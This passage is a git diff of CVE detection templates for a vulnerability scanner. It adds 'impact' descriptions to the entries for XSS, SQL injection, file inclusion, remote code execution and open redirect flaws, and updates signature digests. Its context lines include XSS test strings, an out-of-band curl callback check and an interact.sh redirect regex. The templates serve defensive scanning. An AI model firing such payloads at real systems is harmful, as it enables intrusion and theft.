         status:
           - 200
-# digest: 4a0a00473045022100c3d26468c172793007cfec7f190a679ccd4263c1b32d9e5df4ea3bf95c4bb69802202d2e415b6b70bef75ab7177746bbf547a9c711f20e844ecdf397a9303f057ea9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ffb96a9e52d13b5a8aa181863c513ea7ad68035c486648692f54fe4467c106cc02207c0c7e2a2ef971d52b35b16020fa8a953bfed87c9d9e4f889cfcfdcef0a681f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml
index 62ffa93dc6..2287382efa 100644
--- a/http/cves/2020/CVE-2020-19295.yaml
+++ b/http/cves/2020/CVE-2020-19295.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100db54b9b8821ce2ffbdb08fa69dc37f51e9300c2b66193d6fd3eae9acd4a6fc7702200f6a03b89eff5a619670af8744efe5ad9995bf965f9240138ee9e09ff3bd4585:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d50f509cde933b35f163c3aa2c66d0ea717b0c6286ba0030b7d631ecc7d20b5c02203f565185082f49a4db726c4d3bd7ff0281ed4f9cfe97ac031e21f127fc8ebee2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml
index 116ef8aa05..f5606ddc9d 100644
--- a/http/cves/2020/CVE-2020-19360.yaml
+++ b/http/cves/2020/CVE-2020-19360.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system.
   remediation: |
     Apply the latest patch or upgrade to a version that is not affected by the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022047be14935964d0fdbfc05b5e5c0d21d5f0bdf624e62188355383a74609300dbc022017267f2dd4c38c37b48e1ea86bb169cbac059314b0797e6962df5dbe520f4184:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201f1197ef6f590a265a816702c95ccd5348e82d6fb3438c5eeea1ad3b4e5a8f6b022100ac7c53b619a70916966dc8b58e949a57b0cf01ba0c090e4a1494b5f32629dd9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml
index de6092f4e1..45788cf50c 100644
--- a/http/cves/2020/CVE-2020-1943.yaml
+++ b/http/cves/2020/CVE-2020-1943.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200ca91a5e5f2da62ab3cc45911ccdc46f6e1306adc13f018ef837582503bfb4e90221009a82dc9535ab7eb36f575235117ce90d539aa48895247c2789694c2d51d82ca7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022026790a5fbd1f7792647483097926f6c244910b617a898dba61a325651d6d37cb022100967d1f6e0412f370f03ab9fa3b1c31e71a6e2408d1960ed582c4e06e17479a18:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml
index 24ce8787d8..34ef5d4184 100644
--- a/http/cves/2020/CVE-2020-19515.yaml
+++ b/http/cves/2020/CVE-2020-19515.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207a7c620027aabae2dbdeefb0c29453724a9369e9f3a2113364ff8f2008ff954702201059dab14d902b0c1fef5b99fdc0d7b1b4e76a31f579fb62e99341a77b0c6dfc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e1826f0d853ae8ad4116912a43eb540133b87361f9b834c58a4d35d7cfc24263022100f39c6116e0f615967dcd269e2b5b0f3e816f2d15e46f476dcba7ecf883746bda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml
index ce11b9fc22..0a8b535ba8 100644
--- a/http/cves/2020/CVE-2020-1956.yaml
+++ b/http/cves/2020/CVE-2020-1956.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution and potential compromise of the affected server.
   remediation: |
     Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor.
   reference:
@@ -55,4 +57,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 4a0a00473045022100c0cc1032eaffd31c8b5affd8074957ee30e2ab41954530f369e95ef8f30dbc7502203890e7ac8927e1be877550dd93841d51d4ee26b066e979932076ba5577fae4cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220622109d640f965068546d597680e9cdbe0a0f310095b5337f2f272be43af8978022002be00a90d8ffb2548e5a01fc5d970ebe8bf2740778ebb8bd05733f1396f3b95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml
index 0fb6b81841..f51eb1c498 100644
--- a/http/cves/2020/CVE-2020-19625.yaml
+++ b/http/cves/2020/CVE-2020-19625.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of Gridx.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204c9d8beb187aa5ac1f5d3b2bb570c63c6875a94188c65269067457d7a8f250e602207e010fbc11437eb945a7ef06bd583835b638a8b3e1e2ad20af6cb3861e19ed1b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b44443783724a784833645f2daa6757c18851aee3a87c89dee1854fe8e9d643a022075b0271d81a2995917ee1113784d285b5c45f57cd46b5122b2fee62f80004e42:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml
index 5f6106c432..2129c10239 100644
--- a/http/cves/2020/CVE-2020-20285.yaml
+++ b/http/cves/2020/CVE-2020-20285.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a92a27e671a65fec440b350d3000db98275e40bff850f7a4483b42ba644c5832022100ccdf6c5d0a942589c9dc9b10aca8a3a99d5dccd2e1cfbd984328da7f12efeb8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022004c398e9e088e180f831a7a74ec1ba2c7ef53713326a94529d0f2f33eb231eb902210086dfd03315073d1f8c636a3ff27df10e5980c2033ece7c96a941ea9ba45db0d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml
index 55233c023b..68105c02fc 100644
--- a/http/cves/2020/CVE-2020-20300.yaml
+++ b/http/cves/2020/CVE-2020-20300.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to a patched version of WeiPHP or apply the vendor-supplied patch to fix the SQL Injection vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4b0a004830460221009045d594b69dc2133e36e33c1137020968d579c3cafee67774d3365a7ca2a35c02210080414e24fec1d52348157fcadf3cc11ddf07fe2a7e861983466de3bb06b7674e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cef66ac320cac19fde1cd562c279002b40b4052a3f0aacbb6cfdf43cceaea1fe02203ecd26fc8d72f976ea4b45e04927d07d66c608e47ecea75fe9fdd8b926a56a0d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml
index 4b0419090d..78b3720fe2 100644
--- a/http/cves/2020/CVE-2020-2036.yaml
+++ b/http/cves/2020/CVE-2020-2036.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
           - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')"
           - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"
         condition: or
-# digest: 4b0a00483046022100ebdde807a94dea4ca1027df04444e126a012cc68df0037560644711b75e3cf10022100d89f6939a3d4e3419ef887394d9b74981c2fee4467cac46f1d3c9079b9833453:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220158889289c66b62a49a9f7bc9b0e394b81603f2fbbb0d2b0b7d0b0a6fc72d3a8022100aa0c69bbb6ef062e9fa9f566d4a0ce978319a1775177e09f2bf320bfe9a691ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml
index 998f110e1a..0f735c9b61 100644
--- a/http/cves/2020/CVE-2020-2096.yaml
+++ b/http/cves/2020/CVE-2020-2096.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade to the latest version of Jenkins Gitlab Hook plugin (>=1.4.3) to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ea11f84f905686beecb6331960949e183cf6541aa95162ee7a1d5ea7f527b161022100b1a83f4348920d0d3580a01dc2ee8a85d3d9b34d662cf85bb44fd9c77ad30c1b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201103fd8fa6cfe3dafe3bd86aaa652e0ad3011865c0de308b7966b618b0f633f8022013f511ff9a5b2c17007575d7b65aed06f38ca539b1da567ceff23220a8468775:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml
index f1a0672488..3dbe0193b0 100644
--- a/http/cves/2020/CVE-2020-20982.yaml
+++ b/http/cves/2020/CVE-2020-20982.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu,ritikchaddha
   severity: critical
   description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100dce54e1b17335eb122dd363d6acd8f7a67c92abea0dfb3fab18c42570b6c715302202640b5f71bc4605328db8014c374942b9fef79571e6264bdac9a52532d7f25be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206b513d2c4b4bbd99338d11dfcba53f8f7639db09966a6679cb69d5b091afce9b02205f08f5de2b6030a8f0ff9bd147ad27fff07da3f112d018a6dd83df389c387647:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml
index fdc0de639e..21dcbd05d6 100644
--- a/http/cves/2020/CVE-2020-20988.yaml
+++ b/http/cves/2020/CVE-2020-20988.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")'
           - 'contains(body_2, "DomainMOD")'
         condition: and
-# digest: 4a0a00473045022100b83f77c24efb51f39cbccdd3f02970524e5d0012c2c06d3fe6eec5a63c36f0c0022007fece38c18545b7d2a83cdab5ab5395d7ecb2d8d929a5a8c064c785c1632dec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d8a175b9b463692068858360149fe80c916a899b4d797c65117a0a84fb120b89022042a08403e5439bebcb1ae4b88ebd838fdf916c4fd624dfddde133dd3490f73d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml
index eb426209e7..278e89ac1b 100644
--- a/http/cves/2020/CVE-2020-21012.yaml
+++ b/http/cves/2020/CVE-2020-21012.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0.
   reference:
@@ -43,4 +45,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "Hotel Booking System")'
         condition: and
-# digest: 4a0a00473045022100b6537b9d89be1d9b62b31cab5f372f2b4d2adcac041ad481548bf2ffd8585d4902205e6ca61db418a2545326535613db024db3d7face06bff2a946c0418973578f4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202b5eb5252b87d977bbe6c0b652017e720e804c9a87c120acf52810c9f7c15036022100d5d591938fc317a49dd28f089b0cb9caa015522377a85183b6e5a578b688c8d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml
index 2890bf1526..6b5d43807f 100644
--- a/http/cves/2020/CVE-2020-2103.yaml
+++ b/http/cves/2020/CVE-2020-2103.yaml
@@ -5,6 +5,8 @@ info:
   author: c-sh0
   severity: medium
   description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the Jenkins server.
   remediation: |
     Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
       - type: kval
         kval:
           - x_jenkins
-# digest: 4b0a00483046022100d1e082624e7634d060a8d9d48a86d3b2a694f96dc145331b3b8da8f3bacdb8dc022100b7476a537d579b97e1e20cc379c823f6acd050c4b6ae953cb8b071d6cee78bab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022056c10e7da6c1afc7930826a944865ba85c3cc6669f45876d394a4be4282d635302206ff7f8852b68741b92509649f5cd29bcb11f97aafb00afe79c96b34da1620204:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml
index 6a2cdadc71..d34a97520f 100644
--- a/http/cves/2020/CVE-2020-21224.yaml
+++ b/http/cves/2020/CVE-2020-21224.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ede0fd8f5623681a5150af163fbadc3f63230f6d28c60c1bb1a6eb863bd26a99022100e3cfc1aa8dba6b101eef1f150827e98dcd6517e1758b012627ed62682f6ce509:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022066a3da1f71fccbf57a8f88f0d05dbb185638d9464db09c28d86c3e77d4f5b4db02201d1d9c31d42fc3b6530b25d113208eaf48670daa81bb9af51e4a1628bee96718:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml
index e5f002acb7..bcc50c17a5 100644
--- a/http/cves/2020/CVE-2020-2140.yaml
+++ b/http/cves/2020/CVE-2020-2140.yaml
@@ -5,6 +5,8 @@ info:
   author: j3ssie/geraldino2
   severity: medium
   description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to the latest version of Jenkin Audit Trail (>=3.3) which includes a fix for this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c88365a302ea60ba596dcb4dd218fedc5a095e7a8280a1fe78d733b692631af80220678357deb2f0ee96382fc1bb50fc4f731e223121258ab53c74ce887b4d1efbe9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022052fbf78cd3b374288932ee4a619e7b8e173276502adb258ba1f460c8f92e92be022100c999c374cbf1b4d90591e58c35b650a0f44d85d33b0c56a1ef20464101d065d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml
index 87d020a0f6..f92c8477ab 100644
--- a/http/cves/2020/CVE-2020-22208.yaml
+++ b/http/cves/2020/CVE-2020-22208.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database.
   remediation: |
     Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: body
         words:
           - '{{md5({{num}})}}'
-# digest: 4a0a00473045022063002507e44fdb8f0141e8ca765526de13e1be4950bb55c4ad1794aa7b972d440221009bf554a779ee821b0af4e3cda1dbfdda9a6d88b59c52377ae6407bc05c832e0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022060580f5bbea832a176b3c7e44891e787e0fec1109c530d7ae51513097ed31661022072cb380075b6e67c84054e8502cf836f64776e2042a0729ce00729fddb740141:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml
index 6aa91a36eb..3bff301b69 100644
--- a/http/cves/2020/CVE-2020-22209.yaml
+++ b/http/cves/2020/CVE-2020-22209.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file.
   reference:
@@ -39,4 +41,4 @@ http:
         part: body
         words:
           - '{{md5({{num}})}}'
-# digest: 4a0a00473045022100e1ee69ddf1144c8aceac3bdeadb450e5b409672aa15f7164a1c960edd62777db022068fe0a25f58a42b6d9aaa7435a185750bf503b61cb571a3f070db67495908cb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200cd0d84be1a0f228cb1df04bf605223a1e3b75fbad2866912340df9ec5b7973902207f7393552b2048d6c7ff0c6421a23813611f8a8b16282e07e07e54110ccc82b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml
index 81a069a9c8..36137fea8f 100644
--- a/http/cves/2020/CVE-2020-22210.yaml
+++ b/http/cves/2020/CVE-2020-22210.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file.
   reference:
@@ -39,4 +41,4 @@ http:
         part: body
         words:
           - '{{md5({{num}})}}'
-# digest: 490a0046304402204eb2b37fe1a76522b203d11ec907e4d430db5c678d0adf02c8dd2dffbb0c31c802201b0f017350cbcdf3c4aa1f38e6b91d6a575361f9d0d301d6f3e811bb918ebc5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f304c6863d08ce3354bb15b315e93639315e542186c062f6be8e12562a0a5385022010c1fe6569f43757dc016977dc25c8887c10c4151175696b4b6f742999752392:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml
index 82c4780a50..df626d3ecb 100644
--- a/http/cves/2020/CVE-2020-22211.yaml
+++ b/http/cves/2020/CVE-2020-22211.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms.
   reference:
@@ -39,4 +41,4 @@ http:
         part: body
         words:
           - '{{md5({{num}})}}'
-# digest: 4a0a00473045022068a26daa930630a579d6f76d158da963d858f514d15ff79c8361a9601b4e5a94022100b8d21d6197783bc8f1b54a6fdcc5980a9568bc4159a88221790dcc646b48be0a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022015e19b6a89d518849e74316f0129360a0005587a66402f7b83ee3c51f50b1b2c0220179214a044deea9ac28ca22c94578e55f5a61680de76da062df4a4fd6cf9f5f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml
index 101b2451ad..6c444d5e7a 100644
--- a/http/cves/2020/CVE-2020-22840.yaml
+++ b/http/cves/2020/CVE-2020-22840.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    This vulnerability can be exploited by attackers to trick users into visiting malicious websites, potentially leading to phishing attacks, malware infections, or unauthorized access to sensitive information.
   remediation: |
     Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840).
   reference:
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
-# digest: 4a0a0047304502203407a5faf4b0a2ea21fa972dd8ccac83504f1cf9301646893e1f9d64c354d9b8022100f5a4a64254ce99a3c2dee22d3bce1199aa74fd230e6a3672e11da2bad9024b4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d99fa6ae3fbd3bcc59e0de417f39142b934fedaaac1ffd04c545e766ad9319f9022100d87f87360af19125cec56f01adb08e4ace70a7e5fe3880235350f7eaf4a64fd0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml
index 560d334d10..81ab239d04 100644
--- a/http/cves/2020/CVE-2020-23015.yaml
+++ b/http/cves/2020/CVE-2020-23015.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the disclosure of sensitive information.
   remediation: |
     Upgrade OPNsense to a version higher than 20.1.5 to mitigate the vulnerability.
   reference:
@@ -34,4 +36,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
-# digest: 4a0a00473045022100e0036345b83afa7e5b059360f6bd2ea76662c487e2de8c7755f882ca4c563f3f02202decfaaddf1d8ce97958290a1b3ec36357c4550fd9209ab422e440f53e843757:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022030d6b75fc002cd3921732c3f787843738c346ea9b175f8b444ed960225c18403022100dcc25bc6ce19cac5a3c15956455933bc5be3ebd7bf6990d5d56536a4d6c4f8aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml
index 84222ebd84..ed1ecda57b 100644
--- a/http/cves/2020/CVE-2020-23517.yaml
+++ b/http/cves/2020/CVE-2020-23517.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
